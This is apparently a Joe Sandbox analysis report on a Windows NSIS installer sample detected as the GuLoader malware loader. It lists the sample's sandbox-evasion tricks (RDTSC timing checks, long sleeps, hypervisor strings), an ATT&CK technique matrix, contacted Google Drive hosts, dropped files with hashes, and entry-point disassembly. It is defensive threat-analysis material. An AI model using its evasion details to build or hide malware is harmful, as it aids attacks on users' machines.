      Source: Osb7hkGfAb.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Osb7hkGfAb.exe, 00000008.00000001.2028190142.0000000000649000.00000008.00000001.01000000.00000007.sdmp
      Source: Binary string: mshtml.pdbUGP source: Osb7hkGfAb.exe, 00000008.00000001.2028190142.0000000000649000.00000008.00000001.01000000.00000007.sdmp

      Data Obfuscation

      Source: Yara match File source: 00000000.00000002.2638880242.0000000002A86000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara match File source: 00000008.00000002.2637639337.00000000017C6000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Code function: 0_2_6FF81A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6FF81A98
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Code function: 0_2_6FF82F60 push eax; ret 0_2_6FF82F8E
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe File created: C:\Users\user\AppData\Local\Temp\nswE071.tmp\System.dll (dropped file)
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe API/Special instruction interceptor: Address: 3323683
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe API/Special instruction interceptor: Address: 2063683
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe RDTSC instruction interceptor: First address: 32FCD06 second address: 32FCD06 instructions: 0x00000000 rdtsc 0x00000002 cmp ch, bh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F9468FAB746h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a test ah, ch 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe RDTSC instruction interceptor: First address: 203CD06 second address: 203CD06 instructions: 0x00000000 rdtsc 0x00000002 cmp ch, bh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F94692F97E6h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a test ah, ch 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nswE071.tmp\System.dll (dropped file)
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe TID: 4152 Thread sleep time: -230000s >= -30000s
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Last function: Thread delayed
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Code function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Code function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
      Source: Osb7hkGfAb.exe, 00000008.00000003.2260202498.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2210750583.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2222132435.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2282735602.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000002.2640016739.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2142180181.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2153099213.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2293552393.0000000002E08000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000003.2398996934.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp, Osb7hkGfAb.exe, 00000008.00000002.2640016739.0000000002DA8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe API call chain: ExitProcess graph end node graph_0-4154
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe API call chain: ExitProcess graph end node graph_0-3980
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Code function: 0_2_6FF81A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6FF81A98
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Process created: C:\Users\user\Desktop\Osb7hkGfAb.exe "C:\Users\user\Desktop\Osb7hkGfAb.exe"
      Source: C:\Users\user\Desktop\Osb7hkGfAb.exe Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 11 Masquerading | OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 11 Process Injection | 1 Virtualization/Sandbox Evasion | LSASS Memory | 1 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Clipboard Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Access Token Manipulation | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 23 System Information Discovery | Distributed Component Object Model | Input Capture | 14 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| Osb7hkGfAb.exe | 68% | Virustotal | |
| Osb7hkGfAb.exe | 75% | ReversingLabs | Win32.Trojan.GuLoader |
| Osb7hkGfAb.exe | 100% | Avira | TR/Injector.ofxme |

| Source | Detection | Scanner | Label |
|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\nswE071.tmp\System.dll | 0% | ReversingLabs | |

      No Antivirus matches
      No Antivirus matches

| Source | Detection | Scanner | Label |
|---|---|---|---|
| https://www.google.comll | 0% | Avira URL Cloud | safe |
| http://www.ftp.ftp://ftp.gopher. | 0% | Avira URL Cloud | safe |
| https://www.google.coml | 0% | Avira URL Cloud | safe |

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| drive.google.com | 142.250.184.206 | true | false | | high |
| drive.usercontent.google.com | 216.58.206.33 | true | false | | high |

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://www.google.com | Osb7hkGfAb.exe (memory dump) | false | | high |
| https://www.google.comll | Osb7hkGfAb.exe (memory dump) | false | Avira URL Cloud: safe | unknown |
| http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd | Osb7hkGfAb.exe (memory dump) | false | | high |
| http://nsis.sf.net/NSIS_Error | Osb7hkGfAb.exe | false | | high |
| https://translate.google.com/translate_a/element.js | Osb7hkGfAb.exe (memory dumps) | false | | high |
| https://drive.google.com/ | Osb7hkGfAb.exe (memory dumps) | false | | high |
| https://drive.google.com/ube. | Osb7hkGfAb.exe (memory dump) | false | | high |
| https://drive.google.com/K1I | Osb7hkGfAb.exe (memory dumps) | false | | high |
| https://drive.google.com/ertificates | Osb7hkGfAb.exe (memory dumps) | false | | high |
| https://drive.google.com/lK1I | Osb7hkGfAb.exe (memory dump) | false | | high |
| https://drive.google.com/r | Osb7hkGfAb.exe (memory dumps) | false | | high |
| https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | Osb7hkGfAb.exe (memory dump) | false | | high |
| http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd | Osb7hkGfAb.exe (memory dump) | false | | high |
| http://www.ftp.ftp://ftp.gopher. | Osb7hkGfAb.exe (memory dump) | false | Avira URL Cloud: safe | unknown |
| https://drive.usercontent.google.com/ | Osb7hkGfAb.exe (memory dumps) | false | | high |
| https://apis.google.com | Osb7hkGfAb.exe (memory dump) | false | | high |
| http://nsis.sf.net/NSIS_ErrorError | Osb7hkGfAb.exe | false | | high |
| https://drive.google.com/C1A | Osb7hkGfAb.exe (memory dump) | false | | high |
| https://drive.google.com/c1a | Osb7hkGfAb.exe (memory dump) | false | | high |
| https://www.google.coml | Osb7hkGfAb.exe (memory dump) | false | Avira URL Cloud: safe | unknown |


| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 216.58.206.33 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false |
| 142.250.184.206 | drive.google.com | United States | 15169 | GOOGLEUS | false |

                                            Joe Sandbox version:42.0.0 Malachite
                                            Analysis ID:1587621
                                            Start date and time:2025-01-10 15:52:52 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 6m 23s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:10
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:Osb7hkGfAb.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:ad1dfc910b1815aea7983124549d2c04376db9b2249b99e3e672b91df91bfec6.exe
                                            Detection:MAL
                                            Classification:mal76.troj.evad.winEXE@3/8@2/2
                                            EGA Information:
                                            • Successful, ratio: 50%
                                            HCA Information:
                                            • Successful, ratio: 89%
                                            • Number of executed functions: 46
                                            • Number of non-executed functions: 29
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                            • Excluded IPs from analysis (whitelisted): 20.109.210.53
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

| Time | Type | Description |
|---|---|---|
| 09:54:59 | API Interceptor | 24x Sleep call for process: Osb7hkGfAb.exe modified |

                                            No context
                                            No context
                                            No context

| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| 37f463bf4616ecd445d4a1937da06e19 | fTSt7dc60O.exe | malicious | GuLoader | 216.58.206.33, 142.250.184.206 |
| | vq6jxdGvD6.exe | malicious | GuLoader | 216.58.206.33, 142.250.184.206 |
| | Ub46mg9pn4.exe | malicious | GuLoader | 216.58.206.33, 142.250.184.206 |
| | fTSt7dc60O.exe | malicious | GuLoader | 216.58.206.33, 142.250.184.206 |
| | nRNzqQOQwk.exe | malicious | GuLoader | 216.58.206.33, 142.250.184.206 |
| | You7ynHizy.exe | malicious | GuLoader | 216.58.206.33, 142.250.184.206 |
| | Xjz8dblHDe.exe | malicious | GuLoader | 216.58.206.33, 142.250.184.206 |
| | zrNcqxZRSM.exe | malicious | CobaltStrike, Metasploit | 216.58.206.33, 142.250.184.206 |
| | CY SEC AUDIT PLAN 2025.docx.doc | malicious | Unknown | 216.58.206.33, 142.250.184.206 |

| Match | Associated Sample Name / URL | Detection | Threat Name |
|---|---|---|---|
| C:\Users\user\AppData\Local\Temp\nswE071.tmp\System.dll | fbXZ4ErQMU.exe | malicious | GuLoader |
| | fbXZ4ErQMU.exe | malicious | Unknown |
| | dIPYIbWXs1.exe | malicious | Unknown |
| | dIPYIbWXs1.exe | malicious | GuLoader |
| | eAvqHiIsgR.exe | malicious | GuLoader |
| | eAvqHiIsgR.exe | malicious | GuLoader |
| | RFQ-24064562-SUPPLY-NOv-ORDER.com.exe | malicious | Remcos, GuLoader |
| | LkzvfB4VFj.exe | malicious | FormBook, GuLoader |
| | LkzvfB4VFj.exe | malicious | GuLoader |
| | z120X20SO__UK__EKMELAMA.exe | malicious | GuLoader, Remcos |

                                                                Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):11776
                                                                Entropy (8bit):5.854450882766351
                                                                Encrypted:false
                                                                SSDEEP:192:jPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4I:u7VpNo8gmOyRsVc4
                                                                MD5:34442E1E0C2870341DF55E1B7B3CCCDC
                                                                SHA1:99B2FA21AEAD4B6CCD8FF2F6D3D3453A51D9C70C
                                                                SHA-256:269D232712C86983336BADB40B9E55E80052D8389ED095EBF9214964D43B6BB1
                                                                SHA-512:4A8C57FB12997438B488B862F3FC9DC0F236E07BB47B2BCE6053DCB03AC7AD171842F02AC749F02DDA4719C681D186330524CD2953D33CB50854844E74B33D51
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: fbXZ4ErQMU.exe, Detection: malicious, Browse
                                                                • Filename: fbXZ4ErQMU.exe, Detection: malicious, Browse
                                                                • Filename: dIPYIbWXs1.exe, Detection: malicious, Browse
                                                                • Filename: dIPYIbWXs1.exe, Detection: malicious, Browse
                                                                • Filename: eAvqHiIsgR.exe, Detection: malicious, Browse
                                                                • Filename: eAvqHiIsgR.exe, Detection: malicious, Browse
                                                                • Filename: RFQ-24064562-SUPPLY-NOv-ORDER.com.exe, Detection: malicious, Browse
                                                                • Filename: LkzvfB4VFj.exe, Detection: malicious, Browse
                                                                • Filename: LkzvfB4VFj.exe, Detection: malicious, Browse
                                                                • Filename: z120X20SO__UK__EKMELAMA.exe, Detection: malicious, Browse
                                                                Reputation:moderate, very likely benign file
                                                                Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):210620
                                                                Entropy (8bit):7.5479608224177
                                                                Encrypted:false
                                                                SSDEEP:3072:TxsXh+JF13htt8PqX5tMt86Z3XfXA2QqtG0i3xDW4+E/lXSIjfOxVaXm2:TKXS1x70vXbDGNMGxScOHa1
                                                                MD5:87B5C774E173976A2E28F1BA83D0AF19
                                                                SHA1:84F517D61D4108AF7970FD480EF38F84C69508DD
                                                                SHA-256:D3ADC7A77CF3BED6B58380322BE620D613085797830847ACEF8BAC9B88E14F7A
                                                                SHA-512:D3AAFC404CF4F24AC2A75B0EFB3F815D7B53A3B96132122B490531B488BF04FF4AE5444744FDE22C14B8DCD943AA82AE77350A0247D705C08485D7A1C26AB5F7
                                                                Malicious:false
                                                                Reputation:low
                                                                Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):441234
                                                                Entropy (8bit):2.643055597561025
                                                                Encrypted:false
                                                                SSDEEP:1536:QZmWsnh5l4WzxPFhMOzNJoDb8glX1rYrkbN39D8e7A7Sg2gGqAXr2bHLopKRJ8No:ot0r3reuPrpL/7zB7nMWi0FThhJtG4
                                                                MD5:B3702DCDA1481DA4539338C0B2D6E4EB
                                                                SHA1:40A2001A107BE6C3D4587D8E5FF5FAEFA6C61A1B
                                                                SHA-256:F2F2395066AB9072911FC0D46DAA8DFB2C7AEFB30BE7DAB9B7BBDC7583B9A94F
                                                                SHA-512:AAB912267A32EA594A37BFB57F002AB8340C2CD94C2EB21E37ECE375F899D01207C48E8BF9429FB7CC302E5F17D8F8DF17EA208450D26F416A0372D2BCA245AE
                                                                Malicious:false
                                                                Reputation:low
                                                                Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):485127
                                                                Entropy (8bit):1.2565961974341746
                                                                Encrypted:false
                                                                SSDEEP:768:bgBMgq+aLnwfPnz/Km1iLGyDPiU55NCk+T93YpnK77oTpvYP3knePjlW0kwNGL+q:XQ3wvosOsCpxFJrXSBmHzTu58UR
                                                                MD5:580D05E679E74B036B55CA8E5FF32769
                                                                SHA1:10175C43AB7B725FFFCF770EB2C3555E91D3BA13
                                                                SHA-256:B3E34975017C193D4672BEC42BC52B55F8AE1F1D5F30D56DCFD0B3A4242C3BE4
                                                                SHA-512:0E26F0084BED372785A5E8C8BE3A0717074AA52C2E8B5413FA9F2CB8DEED40BF8BDBF15C411EFFA432A8B96E50AE6085E8F90A97350827AFAA1BE1AB4B3E1643
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):389868
                                                                Entropy (8bit):1.2469892412772452
                                                                Encrypted:false
                                                                SSDEEP:768:8mGX5iY6YFC1hSNYG8n6aCKBHwcX7e3ZNrt7qNIxKpGEopKfWOO72cDEDQ+7IF5i:m5ittaAwW6q8KH13QyOgs2w
                                                                MD5:2A500E1219C4894E2D45C32C5A5A11FD
                                                                SHA1:AC9A88DE4C84E1EB8A535E1061CBC6584380D24E
                                                                SHA-256:C65F223375C6DFE8CE71213D5DD24F39CDE31F772D2C66521BF07B21BE45E6C1
                                                                SHA-512:89ED91AF91CF969FE7EC087EE107B52959582615EFB2AB72A21D6C3820E5BDDA78EE02EB39BB323FD996D85510627387616DF8917B12052A62D288D8E9448596
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):442363
                                                                Entropy (8bit):1.2533707838755617
                                                                Encrypted:false
                                                                SSDEEP:1536:f6KFImN7hPg1fMcZ9pkK6m1rmkrDAji7VW9EgfrY:PyMtabPE+7ctfM
                                                                MD5:5465B75724C031B21C018F7D72941F72
                                                                SHA1:98176B27A41A35401A96D0AAC0859EEC25A4C5FE
                                                                SHA-256:7390780C6FB1F7B57C950A11AE287127CB6144CE9AD1C26E8C242BADB685729B
                                                                SHA-512:7084191B13FF854943DEE9FB6DDC1D7F89D06055FF4DA7E04DA1C359B557AC22762209B8DFE061F3AF628DF077E1D1D1009E9F9A18E3C9441AEE7FD4FDFF1688
                                                                Malicious:false
                                                                Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):521
                                                                Entropy (8bit):4.284169749449499
                                                                Encrypted:false
                                                                SSDEEP:12:7+SriF8i+WUQDJBYqRIE47W0BvM71ARi9ulhji4JDQCr6K:7tuZ+d6/GEUI18jhJsCr6K
                                                                MD5:B089BD0CBC944DE0B1023E6CE9318BD3
                                                                SHA1:715FA74E243D5C3419519E7371ED1836C9BCFA4A
                                                                SHA-256:1E8ABB4A5E85595B0EF2FC73E9012EDDFE1BCB7363E90A2EA46F561DD3742F93
                                                                SHA-512:A164EB2AB02E612E9F96531006C4A71B8D6E8EA6444D86907CB15EF2C1AAB4680EAF3BB580C6A1D5B89A3F454F3E532242FC1DE2B71A9FFF56F812F6E4638885
                                                                Malicious:false
                                                                Preview:dibasic skinnebenssaarenes rembrandt unembayed timerne ependytes overtorturing.ruskindenes cellemembranen visirs daarligste bartholomeuss eslabon trflen communizations karikaturtegners forsgsstadiet hillocked..perfumers afplukker simonized jubilumsmiddags dolktids spokane milliontedel indfoertes dour..margented pomerans semicylindrical skifferolies kernerelationerne univalent,tiltrdelsesforelsning hydrion caggy stabejserne figurist vt klutzier bendy hanekamme..duilin molompi cuartino fornagl tortricoidea unhurrying.
                                                                Process:C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                Category:dropped
                                                                Size (bytes):720
                                                                Entropy (8bit):3.2288126259080765
                                                                Encrypted:false
                                                                SSDEEP:12:8wl0bsXyEKW2jmGlnEEuMqEOMK3w/g/iCNJkKAP4t2YZ/elFlSJm:8slKPjTvuz38/4i2HAFqy
                                                                MD5:B5EA2A86C8F0A31E9DE6AB32353AC214
                                                                SHA1:4944FE188B2CC8BEE79E72CD296EE9500902A74B
                                                                SHA-256:C3224AF89AC5B5CB10EDAEC9D409F784F55209D8472EB0EB675ABDD1B7716916
                                                                SHA-512:25666596525681244EDF2E4A0993376B07F333A4B541A4B90158CBA5E074A148E764C35A21BA925E2FCA8862FD9E8A6BC00C5527E48A54BB5FF60637E9EDFB52
                                                                Malicious:false
                                                                Preview:L..................F........................................................9....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....N.1...........user..:............................................t.i.n.a.....l.2...........Disannex.And37..N............................................D.i.s.a.n.n.e.x...A.n.d.3.7.............\.U.s.e.r.s.\.t.i.n.a.\.D.i.s.a.n.n.e.x...A.n.d.3.7.".C.:.\.U.s.e.r.s.\.t.i.n.a.\.t.r.a.n.c.h.e.t.\.T.r.y.k.m.a.a.l.e.r.e.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                Entropy (8bit):7.544810246742741
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:Osb7hkGfAb.exe
                                                                File size:887'424 bytes
                                                                MD5:a09950fd9af3c4e3ff6f778ab5d8ce0f
                                                                SHA1:043462f3e5a9b3133908c39e6c3fd8a4f0cade1b
                                                                SHA256:ad1dfc910b1815aea7983124549d2c04376db9b2249b99e3e672b91df91bfec6
                                                                SHA512:316f36143bfb519a3fd27766960f8c758867da2df52463b7373431c2788811c11823c06fe4934e990102c9c2039feb010a501ddaa99274973dd0024f192fa3c2
                                                                SSDEEP:24576:QiGFaq43NvC0vEFsNtiqnRCujTrlLq9u4J/QOeaa:QiGFu3NvnEFsNtRdu9u4J/qaa
                                                                TLSH:DC15122AF700D9AAD4708F718D9ED256EBD07E2828200BAB7F997B4BBD72051D01F255
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L... ..`.................f...|......H3............@
                                                                Icon Hash:0e13672535353f1c
                                                                Entrypoint:0x403348
                                                                Entrypoint Section:.text
                                                                Digitally signed:true
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x60FC9220 [Sat Jul 24 22:20:16 2021 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:ced282d9b261d1462772017fe2f6972b
                                                                Signature Valid:false
                                                                Signature Issuer:CN="Customhouses Bagdres Landsale ", E=Vincula@algorithms.Tum, L=Montrose, S=Colorado, C=US
                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                Error Number:-2146762487
                                                                Not Before, Not After
                                                                • 19/02/2024 00:47:06 18/02/2027 00:47:06
                                                                Subject Chain
                                                                • CN="Customhouses Bagdres Landsale ", E=Vincula@algorithms.Tum, L=Montrose, S=Colorado, C=US
                                                                Version:3
                                                                Thumbprint MD5:6E7AA7D21C7430FFA93D1D5E81C70DD6
                                                                Thumbprint SHA-1:5E5C2F65106F0C48F10C0B17A665BA4A7F3796B1
                                                                Thumbprint SHA-256:9FC97C7BD25A0D8FFAED412DBDA9127DE53CBC6E6B4395C7D8146B5291551423
                                                                Serial:29E0A557697DB56E97230C2F058F9E9DD1580106
                                                                Instruction
                                                                sub esp, 00000184h
                                                                push ebx
                                                                push esi
                                                                push edi
                                                                xor ebx, ebx
                                                                push 00008001h
                                                                mov dword ptr [esp+18h], ebx
                                                                mov dword ptr [esp+10h], 0040A198h
                                                                mov dword ptr [esp+20h], ebx
                                                                mov byte ptr [esp+14h], 00000020h
                                                                call dword ptr [004080B8h]
                                                                call dword ptr [004080BCh]
                                                                and eax, BFFFFFFFh
                                                                cmp ax, 00000006h
                                                                mov dword ptr [0042F42Ch], eax
                                                                je 00007F94691B1A63h
                                                                push ebx
                                                                call 00007F94691B4BC6h
                                                                cmp eax, ebx
                                                                je 00007F94691B1A59h
                                                                push 00000C00h
                                                                call eax
                                                                mov esi, 004082A0h
                                                                push esi
                                                                call 00007F94691B4B42h
                                                                push esi
                                                                call dword ptr [004080CCh]
                                                                lea esi, dword ptr [esi+eax+01h]
                                                                cmp byte ptr [esi], bl
                                                                jne 00007F94691B1A3Dh
                                                                push 0000000Bh
                                                                call 00007F94691B4B9Ah
                                                                push 00000009h
                                                                call 00007F94691B4B93h
                                                                push 00000007h
                                                                mov dword ptr [0042F424h], eax
                                                                call 00007F94691B4B87h
                                                                cmp eax, ebx
                                                                je 00007F94691B1A61h
                                                                push 0000001Eh
                                                                call eax
                                                                test eax, eax
                                                                je 00007F94691B1A59h
                                                                or byte ptr [0042F42Fh], 00000040h
                                                                push ebp
                                                                call dword ptr [00408038h]
                                                                push ebx
                                                                call dword ptr [00408288h]
                                                                mov dword ptr [0042F4F8h], eax
                                                                push ebx
                                                                lea eax, dword ptr [esp+38h]
                                                                push 00000160h
                                                                push eax
                                                                push ebx
                                                                push 00429850h
                                                                call dword ptr [0040816Ch]
                                                                push 0040A188h
                                                                Programming Language:
                                                                • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8544 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x58000 | 0x41dd0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xd7720 | 0x1360 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x29c | .rdata
